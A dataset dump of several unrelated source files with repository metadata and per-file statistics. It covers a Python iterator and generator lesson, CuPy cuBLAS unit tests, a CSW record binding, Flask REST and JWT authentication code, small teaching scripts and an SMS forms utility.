2 - python intermediario/63 - iteraveis/64 - comportamento iteradores e geradores.py
AdrianaViabL/Curso-Python-udemy
a4f230354985d0f6026a1e7b4913a8f64e205654
[ "Apache-2.0" ]
null
null
null
2 - python intermediario/63 - iteraveis/64 - comportamento iteradores e geradores.py
AdrianaViabL/Curso-Python-udemy
a4f230354985d0f6026a1e7b4913a8f64e205654
[ "Apache-2.0" ]
null
null
null
#lists, tuplas, strings -> sequencias -> iteraveis nome = 'nome qualquer' print('comportamento esperado de um valor iteravel') print('o valor vai sempre estar la para ser exibido novamente') for l in nome: print(l) print(nome) print(10 * '=====') iterador = iter(nome) try: # quando mostrado x valor de um iterador, o valor nao existe mais nessa variavel print(next(iterador)) # n print(next(iterador)) # o print(next(iterador)) # m print(next(iterador)) # e print(next(iterador)) except: pass print('CADE OS VALORES???') for i in iterador: print(i) print('\ntrabalhando com gerador\n') gerador = (letra for letra in nome) print(next(gerador)) print(next(gerador)) print(next(gerador)) print(next(gerador)) print(next(gerador)) print(10 * '======') for i in gerador: print(i)
21.153846
86
0.676364
119
825
4.689076
0.436975
0.16129
0.15233
0.188172
0.15233
0.15233
0.15233
0.15233
0.15233
0.15233
0
0.005926
0.181818
825
38
87
21.710526
0.820741
0.164848
0
0.413793
0
0
0.243045
0
0
0
0
0
0
1
0
false
0.034483
0
0
0
0.689655
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
2
fb32689f50782a5ff37cf378f6a450894a0dc23f
22,922
py
Python
tests/cupy_tests/test_cublas.py
Onkar627/cupy
8eef1ad5393c0a92c5065bc05137bf997f37044a
[ "MIT" ]
1
2022-01-12T22:57:54.000Z
2022-01-12T22:57:54.000Z
tests/cupy_tests/test_cublas.py
Onkar627/cupy
8eef1ad5393c0a92c5065bc05137bf997f37044a
[ "MIT" ]
null
null
null
tests/cupy_tests/test_cublas.py
Onkar627/cupy
8eef1ad5393c0a92c5065bc05137bf997f37044a
[ "MIT" ]
1
2022-03-21T20:19:12.000Z
2022-03-21T20:19:12.000Z
import numpy import pytest import cupy from cupy import cublas from cupy import testing from cupy.testing import _attr @testing.parameterize(*testing.product({ 'dtype': ['float32', 'float64', 'complex64', 'complex128'], 'n': [10, 33, 100], 'bs': [None, 1, 10], 'nrhs': [None, 1, 10], })) @_attr.gpu class TestBatchedGesv: _tol = {'f': 5e-5, 'd': 1e-12} def _make_random_matrices(self, shape, xp): a = testing.shaped_random(shape, xp, dtype=self.r_dtype, scale=1) if self.dtype.char in 'FD': a = a + 1j * testing.shaped_random(shape, xp, dtype=self.r_dtype, scale=1) return a def _make_well_conditioned_matrices(self, shape): a = self._make_random_matrices(shape, numpy) u, s, vh = numpy.linalg.svd(a) s = testing.shaped_random(s.shape, numpy, dtype=self.r_dtype, scale=1) + 1 a = numpy.einsum('...ik,...k,...kj->...ij', u, s, vh) return cupy.array(a) @pytest.fixture(autouse=True) def setUp(self): self.dtype = numpy.dtype(self.dtype) if self.dtype.char in 'fF': self.r_dtype = numpy.float32 else: self.r_dtype = numpy.float64 n = self.n bs = 1 if self.bs is None else self.bs nrhs = 1 if self.nrhs is None else self.nrhs a = self._make_well_conditioned_matrices((bs, n, n)) x = self._make_random_matrices((bs, n, nrhs), cupy) b = cupy.matmul(a, x) a_shape = (n, n) if self.bs is None else (bs, n, n) b_shape = [n] if self.bs is not None: b_shape.insert(0, bs) if self.nrhs is not None: b_shape.append(nrhs) self.a = a.reshape(a_shape) self.b = b.reshape(b_shape) self.x_ref = x.reshape(b_shape) if self.r_dtype == numpy.float32: self.tol = self._tol['f'] elif self.r_dtype == numpy.float64: self.tol = self._tol['d'] def test_batched_gesv(self): x = cublas.batched_gesv(self.a, self.b) cupy.testing.assert_allclose(x, self.x_ref, rtol=self.tol, atol=self.tol) @testing.parameterize(*testing.product({ 'dtype': ['float32', 'float64', 'complex64', 'complex128'], 'n': [10, 100], 'mode': [None, numpy, cupy], })) @_attr.gpu class TestLevel1Functions: _tol = {'f': 1e-5, 'd': 1e-12} 
@pytest.fixture(autouse=True) def setUp(self): self.dtype = numpy.dtype(self.dtype) self.tol = self._tol[self.dtype.char.lower()] def _make_random_vector(self): return testing.shaped_random((self.n,), cupy, dtype=self.dtype) def _make_out(self, dtype): out = None if self.mode is not None: out = self.mode.empty([], dtype=dtype) return out def _check_pointer(self, a, b): if a is not None and b is not None: assert self._get_pointer(a) == self._get_pointer(b) def _get_pointer(self, a): if isinstance(a, cupy.ndarray): return a.data.ptr else: return a.ctypes.data def test_iamax(self): x = self._make_random_vector() ref = cupy.argmax(cupy.absolute(x.real) + cupy.absolute(x.imag)) out = self._make_out('i') res = cublas.iamax(x, out=out) self._check_pointer(res, out) # Note: iamax returns 1-based index cupy.testing.assert_array_equal(res - 1, ref) def test_iamin(self): x = self._make_random_vector() ref = cupy.argmin(cupy.absolute(x.real) + cupy.absolute(x.imag)) out = self._make_out('i') res = cublas.iamin(x, out=out) self._check_pointer(res, out) # Note: iamin returns 1-based index cupy.testing.assert_array_equal(res - 1, ref) def test_asum(self): x = self._make_random_vector() ref = cupy.sum(cupy.absolute(x.real) + cupy.absolute(x.imag)) out = self._make_out(self.dtype.char.lower()) res = cublas.asum(x, out=out) self._check_pointer(res, out) cupy.testing.assert_allclose(res, ref, rtol=self.tol, atol=self.tol) def test_axpy(self): x = self._make_random_vector() y = self._make_random_vector() a = 1.1 if self.dtype.char in 'FD': a = a - 1j * 0.9 ref = a * x + y if self.mode is not None: a = self.mode.array(a, dtype=self.dtype) cublas.axpy(a, x, y) cupy.testing.assert_allclose(y, ref, rtol=self.tol, atol=self.tol) def test_dot(self): x = self._make_random_vector() y = self._make_random_vector() ref = x.dot(y) out = self._make_out(self.dtype) if self.dtype.char in 'FD': with pytest.raises(TypeError): res = cublas.dot(x, y, out=out) return res = cublas.dot(x, y, out=out) 
self._check_pointer(res, out) cupy.testing.assert_allclose(res, ref, rtol=self.tol, atol=self.tol) def test_dotu(self): x = self._make_random_vector() y = self._make_random_vector() ref = x.dot(y) out = self._make_out(self.dtype) res = cublas.dotu(x, y, out=out) self._check_pointer(res, out) cupy.testing.assert_allclose(res, ref, rtol=self.tol, atol=self.tol) def test_dotc(self): x = self._make_random_vector() y = self._make_random_vector() ref = x.conj().dot(y) out = self._make_out(self.dtype) res = cublas.dotc(x, y, out=out) self._check_pointer(res, out) cupy.testing.assert_allclose(res, ref, rtol=self.tol, atol=self.tol) def test_nrm2(self): x = self._make_random_vector() ref = cupy.linalg.norm(x) out = self._make_out(self.dtype.char.lower()) res = cublas.nrm2(x, out=out) self._check_pointer(res, out) cupy.testing.assert_allclose(res, ref, rtol=self.tol, atol=self.tol) def test_scal(self): x = self._make_random_vector() a = 1.1 if self.dtype.char in 'FD': a = a - 1j * 0.9 ref = a * x if self.mode is not None: a = self.mode.array(a, dtype=self.dtype) cublas.scal(a, x) cupy.testing.assert_allclose(x, ref, rtol=self.tol, atol=self.tol) @testing.parameterize(*testing.product({ 'dtype': ['float32', 'float64', 'complex64', 'complex128'], 'shape': [(10, 9), (9, 10)], 'trans': ['N', 'T', 'H'], 'order': ['C', 'F'], 'mode': [None, numpy, cupy], })) @_attr.gpu class TestGemv: _tol = {'f': 1e-5, 'd': 1e-12} @pytest.fixture(autouse=True) def setUp(self): self.dtype = numpy.dtype(self.dtype) self.tol = self._tol[self.dtype.char.lower()] def test_gemv(self): a = testing.shaped_random(self.shape, cupy, dtype=self.dtype, order=self.order) if self.trans == 'N': ylen, xlen = self.shape else: xlen, ylen = self.shape x = testing.shaped_random((xlen,), cupy, dtype=self.dtype) y = testing.shaped_random((ylen,), cupy, dtype=self.dtype) alpha = 0.9 beta = 0.8 if self.dtype.char in 'FD': alpha = alpha - 1j * 0.7 beta = beta - 1j * 0.6 if self.trans == 'N': ref = alpha * a.dot(x) + beta * 
y elif self.trans == 'T': ref = alpha * a.T.dot(x) + beta * y elif self.trans == 'H': ref = alpha * a.T.conj().dot(x) + beta * y if self.mode is not None: alpha = self.mode.array(alpha) beta = self.mode.array(beta) cupy.cublas.gemv(self.trans, alpha, a, x, beta, y) cupy.testing.assert_allclose(y, ref, rtol=self.tol, atol=self.tol) @testing.parameterize(*testing.product({ 'rank': [5, 9], 'band': [0, 1, 3], 'lower': [0, 1], 'order': ['C', 'F'], 'mode': [None, numpy, cupy], })) @_attr.gpu class TestSbmv: _tol = {'f': 1e-5, 'd': 1e-12} def _gen2band(self, A, ku=0, kl=0, order='C'): assert A.ndim == 2 n, m = A.shape ldm, lda = n, 1 + ku + kl B = numpy.zeros((lda, ldm), dtype=A.dtype, order=order) for j in range(n): k = ku - j for i in range(max(0, j-ku), min(m, j + kl + 1)): B[(k + i), j] = A[i, j] return B @testing.for_dtypes('fd') def test_sbmv(self, dtype): dtype = numpy.dtype(dtype) alpha, beta = 3.0, 2.0 n, k = self.rank, self.band a = numpy.eye(n, n, 0, dtype, self.order) a *= numpy.random.randint(20) for i in range(1, k+1): band = numpy.random.randint(20, size=n-i) a += numpy.diag(band, k=+i) a += numpy.diag(band, k=-i) x = numpy.random.randint(20, size=n).astype(a.dtype) y = numpy.random.randint(20, size=n).astype(a.dtype) ku, kl = k, 0 if self.lower == 1: ku, kl = kl, ku b = self._gen2band(a, ku, kl) a, b = cupy.asarray(a), cupy.asarray(b) x, y = cupy.asarray(x), cupy.asarray(y) ref = alpha * a.dot(x) + beta * y if self.mode is not None: alpha = self.mode.array(alpha) beta = self.mode.array(beta) y_ret = cupy.cublas.sbmv(k, alpha, b, x, beta, y, lower=self.lower) tol = self._tol[dtype.char.lower()] cupy.testing.assert_allclose(y, ref, rtol=tol, atol=tol) cupy.testing.assert_allclose(y_ret, ref, rtol=tol, atol=tol) @testing.parameterize(*testing.product({ 'dtype': ['float32', 'float64', 'complex64', 'complex128'], 'shape': [(10, 9), (9, 10)], 'order': ['C', 'F'], 'mode': [None, numpy, cupy], })) @_attr.gpu class TestGer: _tol = {'f': 1e-5, 'd': 1e-12} 
@pytest.fixture(autouse=True) def setUp(self): self.dtype = numpy.dtype(self.dtype) self.tol = self._tol[self.dtype.char.lower()] self.a = testing.shaped_random(self.shape, cupy, dtype=self.dtype, order=self.order) self.x = testing.shaped_random((self.shape[0],), cupy, dtype=self.dtype) self.y = testing.shaped_random((self.shape[1],), cupy, dtype=self.dtype) self.alpha = 1.1 if self.dtype.char in 'FD': self.alpha = self.alpha - 1j * 0.9 def test_ger(self): if self.dtype.char in 'FD': with pytest.raises(TypeError): cublas.ger(self.alpha, self.x, self.y, self.a) return ref = self.alpha * cupy.outer(self.x, self.y) + self.a if self.mode is not None: self.alpha = self.mode.array(self.alpha) cublas.ger(self.alpha, self.x, self.y, self.a) cupy.testing.assert_allclose(self.a, ref, rtol=self.tol, atol=self.tol) def test_geru(self): ref = self.alpha * cupy.outer(self.x, self.y) + self.a if self.mode is not None: self.alpha = self.mode.array(self.alpha) cublas.geru(self.alpha, self.x, self.y, self.a) cupy.testing.assert_allclose(self.a, ref, rtol=self.tol, atol=self.tol) def test_gerc(self): ref = self.alpha * cupy.outer(self.x, self.y.conj()) + self.a if self.mode is not None: self.alpha = self.mode.array(self.alpha) cublas.gerc(self.alpha, self.x, self.y, self.a) cupy.testing.assert_allclose(self.a, ref, rtol=self.tol, atol=self.tol) @testing.parameterize(*testing.product({ 'nk': [(5, 9), (9, 5)], 'transa': ['N', 'T'], 'ordera': ['F', 'C'], 'orderc': ['F', 'C'], 'lower': [0, 1], 'mode': [None, numpy, cupy] })) @_attr.gpu class TestSyrk: _tol = {'f': 1e-5, 'd': 1e-12} def _make_matrix(self, m, n, trans, order, dtype): if trans == 'N': shape = (m, n) else: shape = (n, m) return testing.shaped_random(shape, cupy, dtype=dtype, order=order, scale=1.0) def _trans_matrix(self, a, trans): if trans == 'N': return a return a.T @testing.for_dtypes('fdFD') def test_syrk(self, dtype): dtype = numpy.dtype(dtype) tol = self._tol[dtype.char.lower()] alpha, beta = 3.0, 2.0 if dtype.char in 
'FD': alpha = alpha - 1j * 2.0 beta = beta + 1j * 5.0 n, k = self.nk a = self._make_matrix(n, k, self.transa, self.ordera, dtype) aa = self._trans_matrix(a, self.transa) ref = alpha * aa.dot(aa.T) # beta is used as a placeholder only c = cublas.syrk(self.transa, a, alpha=alpha, beta=beta, lower=self.lower) rr, cc = cupy.asnumpy(ref), cupy.asnumpy(c) if self.lower: rr[numpy.triu_indices_from(rr, 1)] = 0 else: rr[numpy.tril_indices_from(rr, -1)] = 0 rru = rr[numpy.triu_indices_from(rr)] ccu = cc[numpy.triu_indices_from(cc)] rrl = rr[numpy.tril_indices_from(rr)] ccl = cc[numpy.tril_indices_from(cc)] cupy.testing.assert_allclose(ccu, rru, rtol=tol, atol=tol) cupy.testing.assert_allclose(ccl, rrl, rtol=tol, atol=tol) @testing.for_dtypes('fdFD') def test_syrk_out(self, dtype): dtype = numpy.dtype(dtype) tol = self._tol[dtype.char.lower()] alpha, beta = 2.3, 1.7 if dtype.char in 'FD': alpha = alpha - 1j * 0.7 beta = beta + 1j * 2.3 n, k = self.nk a = self._make_matrix(n, k, self.transa, self.ordera, dtype) aa = self._trans_matrix(a, self.transa) m = aa.shape[0] c = self._make_matrix(m, m, 'N', self.orderc, dtype) c0 = cupy.array(c) ref = alpha * aa.dot(aa.T) + beta * c cublas.syrk(self.transa, a, out=c, alpha=alpha, beta=beta, lower=self.lower) rr, c0, cc = cupy.asnumpy(ref), cupy.asnumpy(c0), cupy.asnumpy(c) if self.lower: trii = numpy.triu_indices_from(rr, 1) else: trii = numpy.tril_indices_from(rr, -1) rr[trii] = c0[trii] rru = rr[numpy.triu_indices_from(rr)] ccu = cc[numpy.triu_indices_from(cc)] rrl = rr[numpy.tril_indices_from(rr)] ccl = cc[numpy.tril_indices_from(cc)] cupy.testing.assert_allclose(ccu, rru, rtol=tol, atol=tol) cupy.testing.assert_allclose(ccl, rrl, rtol=tol, atol=tol) @testing.parameterize(*testing.product({ 'mnk': [(8, 9, 10), (10, 9, 8)], 'transa': ['N', 'T', 'H'], 'transb': ['N', 'T', 'H'], 'ordera': ['C', 'F'], 'orderb': ['C', 'F'], 'orderc': ['C', 'F'], 'mode': [None, numpy, cupy], })) @_attr.gpu class TestGemmAndGeam: _tol = {'f': 1e-5, 'd': 
1e-12} def _make_matrix(self, m, n, trans, order, dtype): if trans == 'N': shape = (m, n) else: shape = (n, m) return testing.shaped_random(shape, cupy, dtype=dtype, order=order, scale=1.0) def _trans_matrix(self, a, trans): if trans == 'T': a = a.T elif trans == 'H': a = a.T.conj() return a @testing.for_dtypes('fdFD') def test_gemm(self, dtype): if not (self.mode is None and self.orderc == 'C'): pytest.skip() dtype = numpy.dtype(dtype) tol = self._tol[dtype.char.lower()] m, n, k = self.mnk a = self._make_matrix(m, k, self.transa, self.ordera, dtype) b = self._make_matrix(k, n, self.transb, self.orderb, dtype) aa = self._trans_matrix(a, self.transa) bb = self._trans_matrix(b, self.transb) ref = aa.dot(bb) c = cublas.gemm(self.transa, self.transb, a, b) cupy.testing.assert_allclose(c, ref, rtol=tol, atol=tol) @testing.for_dtypes('fdFD') def test_gemm_out(self, dtype): dtype = numpy.dtype(dtype) tol = self._tol[dtype.char.lower()] m, n, k = self.mnk a = self._make_matrix(m, k, self.transa, self.ordera, dtype) b = self._make_matrix(k, n, self.transb, self.orderb, dtype) c = self._make_matrix(m, n, 'N', self.orderc, dtype) alpha = 0.9 beta = 0.8 if dtype.char in 'FD': alpha = alpha - 1j * 0.7 beta = beta - 1j * 0.6 aa = self._trans_matrix(a, self.transa) bb = self._trans_matrix(b, self.transb) ref = alpha * aa.dot(bb) + beta * c if self.mode is not None: alpha = self.mode.array(alpha) beta = self.mode.array(beta) cublas.gemm(self.transa, self.transb, a, b, out=c, alpha=alpha, beta=beta) cupy.testing.assert_allclose(c, ref, rtol=tol, atol=tol) @testing.for_dtypes('fdFD') def test_geam(self, dtype): if self.orderc != 'F': pytest.skip() dtype = numpy.dtype(dtype) tol = self._tol[dtype.char.lower()] m, n, _ = self.mnk a = self._make_matrix(m, n, self.transa, self.ordera, dtype) b = self._make_matrix(m, n, self.transb, self.orderb, dtype) alpha = 0.9 beta = 0.8 if dtype.char in 'FD': alpha = alpha - 1j * 0.7 beta = beta - 1j * 0.6 aa = self._trans_matrix(a, self.transa) bb 
= self._trans_matrix(b, self.transb) ref = alpha * aa + beta * bb if self.mode is not None: alpha = self.mode.array(alpha) beta = self.mode.array(beta) c = cublas.geam(self.transa, self.transb, alpha, a, beta, b) cupy.testing.assert_allclose(c, ref, rtol=tol, atol=tol) @testing.for_dtypes('fdFD') def test_geam_out(self, dtype): dtype = numpy.dtype(dtype) tol = self._tol[dtype.char.lower()] m, n, _ = self.mnk a = self._make_matrix(m, n, self.transa, self.ordera, dtype) b = self._make_matrix(m, n, self.transb, self.orderb, dtype) c = self._make_matrix(m, n, 'N', self.orderc, dtype) alpha = 0.9 beta = 0.8 if dtype.char in 'FD': alpha = alpha - 1j * 0.7 beta = beta - 1j * 0.6 aa = self._trans_matrix(a, self.transa) bb = self._trans_matrix(b, self.transb) ref = alpha * aa + beta * bb if self.mode is not None: alpha = self.mode.array(alpha) beta = self.mode.array(beta) cublas.geam(self.transa, self.transb, alpha, a, beta, b, out=c) cupy.testing.assert_allclose(c, ref, rtol=tol, atol=tol) @testing.parameterize(*testing.product({ 'shape': [(9, 10), (10, 9)], 'side': ['L', 'R'], 'ordera': ['C', 'F'], 'orderc': ['C', 'F'], })) @_attr.gpu class TestDgmm: _tol = {'f': 1e-5, 'd': 1e-12} def _setup(self, dtype, xdim=1): self.dtype = numpy.dtype(dtype) self.tol = self._tol[self.dtype.char.lower()] self.a = testing.shaped_random(self.shape, cupy, dtype=dtype, order=self.ordera, scale=1.0) if self.side == 'L': xlen = self.shape[0] elif self.side == 'R': xlen = self.shape[1] if xdim == 0: self.x = cupy.array(1.1, dtype=dtype) elif xdim == 1: self.x = testing.shaped_random( (xlen,), cupy, dtype=dtype, scale=1.0) elif xdim == 2: self.x = testing.shaped_random( (xlen, xlen), cupy, dtype=dtype, scale=1.0) @testing.for_dtypes('fdFD') def test_dgmm(self, dtype): if self.orderc != 'F': pytest.skip() self._setup(dtype) if self.side == 'L': ref = cupy.diag(self.x) @ self.a elif self.side == 'R': ref = self.a @ cupy.diag(self.x) c = cublas.dgmm(self.side, self.a, self.x) 
cupy.testing.assert_allclose(c, ref, rtol=self.tol, atol=self.tol) @testing.for_dtypes('fdFD') def test_dgmm_out(self, dtype): self._setup(dtype) if self.side == 'L': ref = cupy.diag(self.x) @ self.a elif self.side == 'R': ref = self.a @ cupy.diag(self.x) c = cupy.empty(self.shape, order=self.orderc, dtype=dtype) cublas.dgmm(self.side, self.a, self.x, out=c) cupy.testing.assert_allclose(c, ref, rtol=self.tol, atol=self.tol) @testing.for_dtypes('fdFD') def test_dgmm_inplace(self, dtype): if self.orderc != 'F': pytest.skip() self._setup(dtype) if self.side == 'L': ref = cupy.diag(self.x) @ self.a elif self.side == 'R': ref = self.a @ cupy.diag(self.x) cublas.dgmm(self.side, self.a, self.x, out=self.a) cupy.testing.assert_allclose(self.a, ref, rtol=self.tol, atol=self.tol) _dgmm_incx_minus_one_hip_skip_condition = [ ('C', 'F', (9, 10), 'R'), ('C', 'F', (10, 9), 'R'), ('F', 'F', (9, 10), 'L'), ('F', 'F', (10, 9), 'L'), ] def _check_dgmm_incx_minus_one_hip_skip_condition(self): return (self.ordera, self.orderc, self.shape, self.side) in \ self._dgmm_incx_minus_one_hip_skip_condition @testing.for_dtypes('fdFD') def test_dgmm_incx_minus_one(self, dtype): if self.orderc != 'F': pytest.skip() if cupy.cuda.runtime.is_hip: if self._check_dgmm_incx_minus_one_hip_skip_condition(): pytest.xfail('HIP dgmm may have a bug') self._setup(dtype) if self.side == 'L': ref = cupy.diag(self.x[::-1]) @ self.a elif self.side == 'R': ref = self.a @ cupy.diag(self.x[::-1]) c = cublas.dgmm(self.side, self.a, self.x, incx=-1) cupy.testing.assert_allclose(c, ref, rtol=self.tol, atol=self.tol) @testing.for_dtypes('fdFD') def test_dgmm_x_scalar(self, dtype): if self.orderc != 'F': pytest.skip() self._setup(dtype, xdim=0) ref = self.x * self.a c = cublas.dgmm(self.side, self.a, self.x, incx=0) cupy.testing.assert_allclose(c, ref, rtol=self.tol, atol=self.tol) @testing.for_dtypes('fdFD') def test_dgmm_x_matrix(self, dtype): if self.orderc != 'F': pytest.skip() self._setup(dtype, xdim=2) if self.side 
== 'L': ref = cupy.diag(cupy.diag(self.x)) @ self.a incx = self.shape[0] + 1 elif self.side == 'R': ref = self.a @ cupy.diag(cupy.diag(self.x)) incx = self.shape[1] + 1 c = cublas.dgmm(self.side, self.a, self.x, incx=incx) cupy.testing.assert_allclose(c, ref, rtol=self.tol, atol=self.tol)
35.871674
79
0.547596
3,308
22,922
3.683797
0.069226
0.031594
0.041851
0.057443
0.784753
0.757344
0.715411
0.666749
0.622107
0.594042
0
0.01925
0.299712
22,922
638
80
35.9279
0.739908
0.00445
0
0.576655
0
0
0.02301
0.001008
0
0
0
0
0.055749
1
0.076655
false
0
0.010453
0.003484
0.142857
0
0
0
0
null
0
0
0
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
fb3c3876b330f5a1310fa02ca86fedafa73ed588
273
py
Python
catalog/bindings/csw/brief_record.py
NIVANorge/s-enda-playground
56ae0a8978f0ba8a5546330786c882c31e17757a
[ "Apache-2.0" ]
null
null
null
catalog/bindings/csw/brief_record.py
NIVANorge/s-enda-playground
56ae0a8978f0ba8a5546330786c882c31e17757a
[ "Apache-2.0" ]
null
null
null
catalog/bindings/csw/brief_record.py
NIVANorge/s-enda-playground
56ae0a8978f0ba8a5546330786c882c31e17757a
[ "Apache-2.0" ]
null
null
null
from dataclasses import dataclass from bindings.csw.brief_record_type import BriefRecordType __NAMESPACE__ = "http://www.opengis.net/cat/csw/2.0.2" @dataclass class BriefRecord(BriefRecordType): class Meta: namespace = "http://www.opengis.net/cat/csw/2.0.2"
24.818182
58
0.754579
38
273
5.263158
0.552632
0.13
0.16
0.23
0.35
0.35
0.35
0.35
0.35
0.35
0
0.025105
0.124542
273
10
59
27.3
0.811715
0
0
0
0
0
0.263736
0
0
0
0
0
0
1
0
false
0
0.285714
0
0.571429
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
2
348d2d60fb5385e97d0dc27346784f7b73fdadac
331
py
Python
example/demo/book/views.py
iwwxiong/flask_restapi
57fca3bf07d913b31b6b7ef877328b0e07056c39
[ "MIT" ]
6
2019-04-23T02:18:55.000Z
2019-12-10T13:16:21.000Z
example/demo/book/views.py
dracarysX/flask_scaffold
57fca3bf07d913b31b6b7ef877328b0e07056c39
[ "MIT" ]
null
null
null
example/demo/book/views.py
dracarysX/flask_scaffold
57fca3bf07d913b31b6b7ef877328b0e07056c39
[ "MIT" ]
3
2019-05-22T06:00:17.000Z
2020-01-14T17:02:35.000Z
#! /usr/bin/env python # -*- coding: utf-8 -*- # flask_restapi import from flask_restapi.views import APIMethodView from .models import Book from .forms import BookForm class BookView(APIMethodView): model = Book paginate_by = 10 context_object_name = 'items' pk_url_kwarg = 'book_id' form_class = BookForm
19.470588
45
0.716012
44
331
5.181818
0.727273
0.105263
0
0
0
0
0
0
0
0
0
0.011236
0.193353
331
16
46
20.6875
0.842697
0.193353
0
0
0
0
0.045455
0
0
0
0
0
0
1
0
false
0
0.333333
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
3492885ac8a900a114a775185286f143d7123ed9
236
py
Python
data/python/pattern_12/code.py
MKAbuMattar/grammind-api
ccf6e9898f50f9e4c7671abecf65029198e2dc72
[ "MIT" ]
3
2021-12-29T13:03:27.000Z
2021-12-31T20:27:17.000Z
data/python/pattern_12/code.py
MKAbuMattar/grammind-api
ccf6e9898f50f9e4c7671abecf65029198e2dc72
[ "MIT" ]
2
2022-01-15T13:08:13.000Z
2022-01-18T19:41:07.000Z
data/python/pattern_12/code.py
MKAbuMattar/grammind-api
ccf6e9898f50f9e4c7671abecf65029198e2dc72
[ "MIT" ]
null
null
null
#MAIN PROGRAM STARTS HERE: num = int(input('Enter the number of rows and columns for the square: ')) for x in range(0, num): i = x + 1 for y in range(0, num): print ('{} '.format(i), end='') i += num print()
26.222222
73
0.555085
39
236
3.358974
0.666667
0.10687
0.122137
0.167939
0
0
0
0
0
0
0
0.017857
0.288136
236
9
74
26.222222
0.761905
0.105932
0
0
0
0
0.265403
0
0
0
0
0
0
1
0
false
0
0
0
0
0.285714
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
349c048a588296bb67dea9d1d337e93b39772ac1
381
py
Python
03_Avanzado/09_CursoBasico_Python/codigo/funciones.py
LeoSan/CarreraFundamentosProgramacion_Platzi_2021
9db6ac33a755f855fbb9c41a9bd0e02712f37cb3
[ "MIT" ]
null
null
null
03_Avanzado/09_CursoBasico_Python/codigo/funciones.py
LeoSan/CarreraFundamentosProgramacion_Platzi_2021
9db6ac33a755f855fbb9c41a9bd0e02712f37cb3
[ "MIT" ]
null
null
null
03_Avanzado/09_CursoBasico_Python/codigo/funciones.py
LeoSan/CarreraFundamentosProgramacion_Platzi_2021
9db6ac33a755f855fbb9c41a9bd0e02712f37cb3
[ "MIT" ]
null
null
null
#Programa ejemplo para usar función #funcion sin parametros def imprimir_mensaje(): print("Mensaje especial:") print("Estoy aprendiendo:") imprimir_mensaje() #funcion con parametros valorA= "Hola mundo" valorB= "Función con parametros" def imprimir_mensaje_param(mensaje1, mensaje2): print(mensaje1) print(mensaje2) imprimir_mensaje_param(valorA, valorB)
20.052632
47
0.755906
44
381
6.409091
0.522727
0.212766
0.148936
0.198582
0
0
0
0
0
0
0
0.012384
0.152231
381
18
48
21.166667
0.860681
0.207349
0
0
0
0
0.22408
0
0
0
0
0
0
1
0.2
false
0
0
0
0.2
0.4
0
0
0
null
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
34a22dd4ad9ab46d6938c8ba8be9e6f6b3432bf1
497
py
Python
quickkart_api/auth.py
envaleed/quick-kart-api-deploy
2b962dce3bc5ba19d4e90cb86822c016d51f65c2
[ "MIT" ]
null
null
null
quickkart_api/auth.py
envaleed/quick-kart-api-deploy
2b962dce3bc5ba19d4e90cb86822c016d51f65c2
[ "MIT" ]
null
null
null
quickkart_api/auth.py
envaleed/quick-kart-api-deploy
2b962dce3bc5ba19d4e90cb86822c016d51f65c2
[ "MIT" ]
null
null
null
from quickkart_api import app from quickkart_api.models import Users from flask_jwt import JWT, jwt_required, current_identity from flask import abort def authenticate(username, password): user = Users.query.filter_by(username=username).first() if user and user.check_password(password): return user return abort(500, "Authentication failed") def identity(payload): return Users.query.filter(Users.id == payload['identity']).scalar() jwt = JWT(app,authenticate,identity)
33.133333
71
0.7666
67
497
5.58209
0.477612
0.069519
0.085562
0
0
0
0
0
0
0
0
0.007009
0.138833
497
15
72
33.133333
0.866822
0
0
0
0
0
0.058233
0
0
0
0
0
0
1
0.166667
false
0.166667
0.333333
0.083333
0.75
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
1
0
0
0
0
2
34a3c5979c5216c22bb261f3a724f1a3a6ea121a
799
py
Python
corehq/apps/smsforms/util.py
rochakchauhan/commcare-hq
aa7ab3c2d0c51fe10f2b51b08101bb4b5a376236
[ "BSD-3-Clause" ]
null
null
null
corehq/apps/smsforms/util.py
rochakchauhan/commcare-hq
aa7ab3c2d0c51fe10f2b51b08101bb4b5a376236
[ "BSD-3-Clause" ]
1
2021-06-02T04:45:16.000Z
2021-06-02T04:45:16.000Z
corehq/apps/smsforms/util.py
rochakchauhan/commcare-hq
aa7ab3c2d0c51fe10f2b51b08101bb4b5a376236
[ "BSD-3-Clause" ]
null
null
null
from dimagi.utils.couch import CriticalSection from corehq.apps.receiverwrapper.util import submit_form_locally def form_requires_input(form): """ Returns True if the form has at least one question that requires input """ for question in form.get_questions([]): if question["tag"] not in ("trigger", "label", "hidden"): return True return False def process_sms_form_complete(session, form): result = submit_form_locally(form, session.domain, app_id=session.app_id, partial_submission=False) session.submission_id = result.xform.form_id session.mark_completed(True) session.save() def critical_section_for_smsforms_sessions(contact_id): return CriticalSection(['smsforms-sessions-lock-for-contact-%s' % contact_id], timeout=5 * 60)
30.730769
103
0.738423
107
799
5.308411
0.570093
0.035211
0.059859
0
0
0
0
0
0
0
0
0.004491
0.163955
799
25
104
31.96
0.845808
0.08761
0
0
0
0
0.081346
0.051893
0
0
0
0
0
1
0.214286
false
0
0.142857
0.071429
0.571429
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
34d35a78f92c8bdc372877964e8913cfb9da9911
197
py
Python
Areatriangulo.py
ChristianSalas1234567/salas-yupanqui
36fdbe3ebc51cd73f62870fcc8b646ad98133ae7
[ "Apache-2.0" ]
1
2021-04-22T12:34:37.000Z
2021-04-22T12:34:37.000Z
Areatriangulo.py
